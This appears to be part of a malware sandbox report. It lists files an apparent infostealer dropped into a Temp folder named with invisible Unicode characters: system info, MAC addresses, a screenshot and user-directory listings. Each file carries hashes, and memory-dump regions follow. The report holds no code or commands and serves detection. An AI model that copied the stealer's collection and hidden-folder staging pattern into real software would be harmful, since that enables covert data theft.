SHA512 e43f5110634837b8fb6223016ca1fc603abfcf82db5f28f51b5b3660b71b15253c8d011dcfea11f92382e32bfa007c91f7097393ccc190d78f5cedb09e979c9a

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \System\System Info.txt

MD5 ccf31995e8c2c3bf378b858816ba91e7
SHA1 e6d8321a903761e7e8bdaf3674cb284f238c6697
SHA256 aa1cec4b0d9c5379b002c03ecb4d99e535feb656d5e6d95d2d03358a06f97e35
SHA512 7ebfa41781637dbe0a3e0c053c8be15c0f3d9d48cb430eec16bf976a58263ac7806e9134b1bd8eed67a61dc50fdc2cf894fc56bf9dd88acda7d24b5679a6b3a6

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \System\MAC Addresses.txt

MD5 b197e319a2b2ee2bf40f2d2b847ef931
SHA1 c350e85706b6e404e186f03d985dd4ea1cfa341b
SHA256 9f858c1d34d9c93c6d55cb34ebbe6403ce18563b4c9a4659c37878f7bff9685d
SHA512 e02498486e8bdab5ef626cf6f643b29cd8928e7fffaa325cacb7e1cd14a9a777751556782d1a8d239ce1ea6516e13e261c4917ab982c545066a93dbf28e2969a

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Display (1).png

MD5 e7c53515b9bc4aba7d3e9a506093b275
SHA1 2a2faa43595922abd452ff303b2fd70f4d0f3737
SHA256 472acf99369eefb8b89584d00c2f0aef162746785824d9b311e069facb48b182
SHA512 234a4f71013b384d091ca4ff0645732c201fdd34495f10bd493b1e8051e0d75b8dd9449c28c4e8ed3a7618204d152818a261ca032125b4b992d69a09d2a91557

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Pictures.txt

MD5 72ab7c99ecd2e90ebbaa11cbef60449c
SHA1 9934079ce8236b765e174de2dd0f01438c5348ae
SHA256 407ff70da7a1b1c86f91a3032b6cf613daaf6dca8824ce87a814f66a6c45a989
SHA512 e908e572ce519afd2a30480ed52bc25bb664bc24aaab26c3962d5bcacde10352b4911c248a22e361a22f9ef78958e8e249783be8f1a2cc4aa4bbf82379c3d244

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Music.txt

MD5 ba465c66e857ceb29aa1d864c8701178
SHA1 e35c4c575c85ced705ad16e7a4b4bc200eba3be9
SHA256 20ae35ae6f3b6066a7b76546e0e2a721b7450146446c660efd0ea8e176b84c3e
SHA512 e74ebbb14effb29482ed8d54ff7303a2d0db5a770620bc061070086cf8b7ac7a2e6b9ceee8da7a442034befe0f71fe4ae2377a432698d144c3154d082c377546

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Downloads.txt

MD5 aac1fb5b14593bdfb12858ed579db4f0
SHA1 43d48ec7eb0351ed823f47fd8224a00c345c6190
SHA256 36b95c52baef48e6388e17508d1a374b95c894d48b897b2b865a0371d9043a0b
SHA512 51d7af8f30d094657b19765cee1f63b52ef5105ab9b54ba74ed52211e2d66b0a47657f6837fcf4e5d6962d1283fe39341ee5fb940e7f8df80a025195a96c8db4

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Documents.txt

MD5 9afd755aaf71fb244aa2bf2181422dcd
SHA1 c5c08feff2bf4aa1858a24b90314ad5afd476114
SHA256 1af6e8eda59abe6f4c4bb6fcb6cc0583f8037caba39d92d5788c179b648af05f
SHA512 bc2d9c8e095f8fd9eadd5c42f56ec14e1cdfc764c511fb28c0aea8c3320c71446ca56d866a09c7dce4504706100331a4a659468f35dfcc02e327a98eb2dcfb49

C:\Users\Admin\AppData\Local\Temp\‎‌   ‏  ‍ \Directories\Desktop.txt

MD5 47f76b064d5686a717db7f2daf6b462e
SHA1 e58056959320a4a9ea95d1cd6d56684ad5536ff7
SHA256 0652a07eefb66b4532d6e937d186d2ccb07db77cbd1539b729306ea4662c3eaa
SHA512 f631ec20826ca56f8fdce209bf40deb786ba7fe027f32a9ecc01477d783db3e211b38b79564734d57fd3a364bc541ab0fa134e4feccbd92ce3c76de74ce25fcf

memory/2704-157-0x000001A86B590000-0x000001A86B5A0000-memory.dmp

memory/4148-153-0x0000020B41400000-0x0000020B41410000-memory.dmp

memory/3164-304-0x00007FFE1B020000-0x00007FFE1B02D000-memory.dmp

memory/3164-307-0x00007FFE04410000-0x00007FFE04932000-memory.dmp

memory/3164-310-0x00007FFE15960000-0x00007FFE15A7C000-memory.dmp

memory/3164-309-0x00007FFE18CE0000-0x00007FFE18CED000-memory.dmp

memory/3164-308-0x00007FFE16170000-0x00007FFE16184000-memory.dmp

memory/3164-306-0x00007FFE15A80000-0x00007FFE15B4D000-memory.dmp

memory/3164-305-0x00007FFE16190000-0x00007FFE161C3000-memory.dmp

memory/3164-303-0x00007FFE18B70000-0x00007FFE18B89000-memory.dmp

memory/3164-302-0x00007FFE15E30000-0x00007FFE15FA6000-memory.dmp

memory/3164-301-0x00007FFE18CF0000-0x00007FFE18D13000-memory.dmp

memory/3164-300-0x00007FFE1AE40000-0x00007FFE1AE59000-memory.dmp

memory/3164-299-0x00007FFE18D20000-0x00007FFE18D4D000-memory.dmp

memory/3164-298-0x00007FFE1B030000-0x00007FFE1B03F000-memory.dmp

memory/3164-297-0x00007FFE18D50000-0x00007FFE18D74000-memory.dmp

memory/3164-296-0x00007FFE10250000-0x00007FFE1083E000-memory.dmp